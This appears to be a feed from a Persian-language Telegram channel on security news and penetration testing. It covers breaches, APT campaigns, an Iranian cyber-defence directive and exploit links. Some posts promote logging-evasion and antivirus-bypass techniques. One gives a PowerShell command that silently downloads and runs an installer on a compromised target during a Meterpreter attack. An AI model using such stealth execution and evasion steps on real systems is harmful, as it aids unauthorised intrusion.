امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
فریمورک NoPowerShell که به زبان سی شارپ نوشته شده و قابلیت اجرای دستورات پاورشل و جلوگیری از لاگ شدن این دستورات توسط ابزارهای امنیتی را دارد.
همچنین میتوان از آن در Cobalt Strike استفاده و دستورات را در حافظه اجرا نمود.

https://github.com/bitsadmin/nopowershell


این فریمورک هنوز کامل نشده و در حال توسعه میباشد.


#windows
#ps
#post_exploit


@sec_nerd
به گوگل اعتماد نکنید!

#google
#fun

@sec_nerd
دستگاه‌های اجرایی ملزم به فعال کردن سامانه پدافند سایبری شدند


البته متن طولانیه و میتونید در لینک منبع کاملش رو بخونید، اینجا فقط بند پ ماده ۵ رو خلاصه میکنم:

دستگاههای اجرایی ملی و استانی موظفند سامانه پدافند رایانیکی(سایبری) دستگاه خود را در سطح ملی و استانی فعال نمایند:

نظام رصد، پایش، تشخیص و هشداردهی تهدیدات سایبری
نظام تعیین وضعیت و مدیریت صحنه پدافند سایبری و پاسخ
نظام کاهش آسیب پذیری، مصون سازی و مقاوم سازی زیرساختهای سایبری
نظام آموزش، تمرین، رزمایش و ارتقای آمادگی و برگزاری رزمایش


دستگاه‌های اجرایی ملی و استانی که سرمایه های ملی سایبری و سرمایه های وابسته به سایبر(حیاتی، حساس و مهم) را در اختیار دارند موظف اند به منظور جلوگیری از نفوذ و مختل نمودن سامانه های نرم افزاری دستگاههای ذی ربط و توسعه آمادگی‌ها، مدیران و کارکنان خود را بر اساس نظام آموزش پدافند سایبری مصوب کمیته دائمی و هدایت و راهبری سازمان آموزش داده و توانمند نمایند.

به منظور ایجاد هماهنگی بین اقدامات و برنامه های پدافند سایبری در دستگاههای اجرایی "کمیته هماهنگی پدافند سایبری" با مسئولیت سازمان/ قرارگاه پدافند سایبری و عضویت مرکز راهبردی افتا (امنیت فضای تبادل اطلاعات)، مرکز ماهر(مدیریت امداد و هماهنگی رخدادهای رایانه ای)، فرماندهی سایبر الکترونیک سپاه و پلیس فتا تشکیل می شود.


منبع:
https://fna.ir/bq6p3r


#iran
#cyber
#security
#news



@sec_nerd
امنیت اطلاعات
دستگاه‌های اجرایی ملزم به فعال کردن سامانه پدافند سایبری شدند البته متن طولانیه و میتونید در لینک منبع کاملش رو بخونید، اینجا فقط بند پ ماده ۵ رو خلاصه میکنم: دستگاههای اجرایی ملی و استانی موظفند سامانه پدافند رایانیکی(سایبری) دستگاه خود را در سطح ملی و…
جستجوهای من برای پیدا کردن "نظام آموزش پدافند سایبری" بی نتیجه بود اگر شما جزییاتی ازش پیدا کردید برای ما بفرستید @chrispal
اما اینکه اعضای کمیته هماهنگی پدافند سایبری رو میبینید و ممکنه با خودتون فکر کنید که «مگه تا حالا امورات دفاع سایبری دست همینا نبود؟» یه کمی ممکنه حس بشه که چیزی قرار نیست تغییر کنه!
کارشناسان کاربلد امنیت رو برخلاف شعار ابتدایی جناب وزیر جهرمی، کسی تحویل نگرفته و نمیگیره و مشخص نیست اون قسمت آموزش مدیران و کارکنان رو چه کسی باید انجام بده.
اگر سطح آموزش ها در حد پیج اینستاگرام باشه،‌اساتیدی مثل بهروز کمالیان و آرمین راد، دردانه های امنیت سایبری رو میشه روشون حساب کرد اما امیدوارم اون بخش سرمایه های ملی سایبر (حیاتی، حساس و مهم) رو به اینها نسپرن و همینجوری که هست باقی بمونه، حداقلش اینه که الان سالی یکی دو بار بیشتر با حمله ی سایبری روترهامون از مدار خارج نمیشن!


#iran
#news


راستی مبدع اون کلمه «رایانیکی» رو هم اگر میشناسید یه سلام خاص بهش برسونید 😁😭

@sec_nerd
اجرای پیلودهای Meterpreter در حافظه برای جلوگیری از شناسایی آن توسط آنتی ویروس ها

https://www.n00py.io/2018/06/executing-meterpreter-in-memory-on-windows-10-and-bypassing-antivirus/


در این پست خواهید دید که چگونه میتوان با تولید پیلود و ارسال آن از طریق smb یا webdav (البته راه های زیادی برای انتقال فایل xml تولید شده به سیستم تارگت وجود دارد از جمله نفوذ از طریق وب یا ftp و ...) آن را اجرا و سشن meterpreter را بر روی سیستم مهاجم بدست آورد.



#msf
#windows
#av
#bypass


@sec_nerd
شرح Phar Deserialization روش جدید اکسپلویت کردن در php است و در WooCommerce منجر به RCE میشود.

https://blog.ripstech.com/2018/phpbb3-phar-deserialization-to-remote-code-execution/


#php
#exploit
#rips
#phpbb3



@sec_nerd
امنیت اطلاعات
اجرای پیلودهای Meterpreter در حافظه برای جلوگیری از شناسایی آن توسط آنتی ویروس ها https://www.n00py.io/2018/06/executing-meterpreter-in-memory-on-windows-10-and-bypassing-antivirus/ در این پست خواهید دید که چگونه میتوان با تولید پیلود و ارسال آن از طریق…
اگر دات نت فریمورک 4 روی سیستم هدف نصب نبود با دستور زیر میتوانید، از طریق پاورشل و بدون جلب توجه، آنرا نصب کنید:

((new-object net.webclient).DownloadFile("https://download.microsoft.com/download/9/5/A/95A9616B-7A37-4AF6-BC36-D6EA96C8DAAE/dotNetFx40_Full_x86_x64.exe","dotNetFx40_Full_x86_x64.exe"))
& .\dotNetFx40_Full_x86_x64.exe /q


روش بر روی ویندوز ۲۰۰۸ r2 تست شده
با کسپرسکای و پیلود reverse_tcp

#msf
#windows
#av
#bypass


@sec_nerd
بزرگترین وبسایت پرسش و پاسخ جهان، Quora توسط هکرهای ناشناخته ای هک شد!
این هکرها موفق شدند به اطلاعات شخصی حدود ۱۰۰ میلیون کاربر این وبسایت دست پیدا کنند. این اتفاق در روز دوشنبه رخ داد و تیم Quora متوجه شد که یک دسترسی غیرمجاز بر روی یکی از سیستم ها ایجاد شده است.
اطلاعات کاربری شامل نام، ایمیل، پسورد هش شده ، سوال و جوابها، پیامهای خصوصی، کامنتها، لایکها و اطلاعات ایمپورت شده از شبکه های اجتماعی نظیر فیسبوک و توییتر در این دیتابیس وجود داشته است.
شرکت Quora اعلام کرد که تمام پسوردها بصورت سالت شده و هش شده ذخیره شده اند اما تمامی کاربرانی که در بین این صد میلیون وجود داشته اند توسط تیم Quora بصورت اجباری از حسابشان اخراج و مجبور به تغییر پسورد شده اند.



https://thehackernews.com/2018/12/quora-hack.html

#news
#quora
#breach


@sec_nerd
مایکروسافت قصد دارد مرورگر edge را با مرورگری که بر پایه ی Chromium ساخته شده و Anaheim نام دارد، جایگزین کند.


https://thehackernews.com/2018/12/edge-browser-anaheim-chromium.html


#news
#edge
#microsoft


@sec_nerd
امنیت اطلاعات
اطلاعات جدید در مورد کمپین فیشینگ MuddyWater که به ادعای شرکت اسراییلی ClearSky مرتبط با ایران است، بدست آمده. این کمپین اخیرا با استفاده از روش های مخفی سازی پیلود در بکدور خود با دستورات PowerShell و استفاده از دامنه های اسراییلی و لبنانی، اقدام به آلوده…
هکرهای گروه Muddywater که ادعا میشود ایرانی هستند به رده بندی ارائه شده توسط کسپرسکای و قرار گرفتن در رده سوم معترض شده اند!

آنها در کامنتی که به پست کسپرسکای ارسال کردند گفته اند: ما معتقدیم که رده سوم عادلانه نیست، اگر شما کار ما را دنبال میکردید میدانستید که عملیات ما بسیار قویتر از چیزیست که شما گفتید. اطلاعات جدید را به تصویر اضافه و پست را آپدیت کنید.
این تازه شروع کار ماست!



گزارش کسپرسکای:
https://securelist.com/kaspersky-security-bulletin-2018-top-security-stories/89118/


#kaspersky
#muddywater
#iran
#apt


@sec_nerd
بزرگترین حملات سایبری تاریخ:

هتلهای Marriot با ۵۰۰ میلیون کاربر

یاهو با ۵۰۰ میلیون کاربر

کمپانی equifax با ۱۴۵/۵ میلیون کاربر

وبسایت myspace با ۳۶۰ میلیون کاربر

کمپانی درمانی Anthem با ۷۸/۸ میلیون کاربر


https://medium.com/colendi/biggest-hack-attacks-of-all-times-marriott-equifax-yahoo-and-others-83446d995c9c


اخبار مربوط به این حملات را در کانال، با جستجوی نام شرکتها میتوانید بخوانید.


#breach
#statistics


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
آسیب پذیری موجود در پلاگین Redirection وردپرس که در بیش از یک میلیون وبسایت وردپرسی نصب شده است به هکرها اجازه میدهد تا بر روی سایت وب شل مورد نظر خود را بسازند.


برای توضیحات بیشتر تقویم روز پنجم را ببینید:
https://www.ripstech.com/php-security-calendar-2018/


#wordpress
#wp
#csrf


@sec_nerd
هکرهای دولتی کره شمالی از یک افزونه آلوده ی گوگل کروم به نام Auto Font Manager برای آلوده کردن کاربران استفاده میکردند.
این افزونه قابلیت دزدیدن کوکی، پسورد و حتی فوروارد کردن ایمیل ها را داشته است.
افزونه ی مورد اشاره حداقل از ماه می ۲۰۱۸ در وب استور کروم قرار داشته است.


https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/


#news
#google
#apt
#nk
#chrome


@sec_nerd
دستگاهی که در تصویر میبینید یک اوسیلوسکوپ یا همان نوسان سنج است که یک نرم افزار رابط نیز برای اتصال با کامپیوتر دارد.
این دستگاه سرویس تل نت را نیز بر روی پورت ۲۳ ارائه میکند، نکته جالب اینجاست که این دستگاه دارای دو اکانت مخفی root و siglent است که به هکر اجازه میدهد با سطح دسترسی روت، وارد شبکه شود!


https://www.bleepingcomputer.com/news/security/digital-oscilloscope-comes-with-backdoor-accounts-old-software-components/


#backdoor
#network


@sec_nerd
سورس فلش مربوط به آسیب پذیری CVE-2018-15982 که توسط هکرهای کره شمالی مورد استفاده قرار گرفت و اخیرا شرکت adobe وصله امنیتی برای آن منتشر کرده است.

https://github.com/prsecurity/CVE-2018-15982/


این آسیب پذیری مرورگرهای کروم، اج و اینترنت اکسپلورر را در سیستم عاملهای ویندوز، مک، لینوکس و کروم مورد هدف قرار میداد.


https://threatpost.com/adobe-patches-zero-day-vulnerability-in-flash-player/139629/


#news
#flashplayer
#chrome
#nk
#apt
#chrome
#edge


@sec_nerd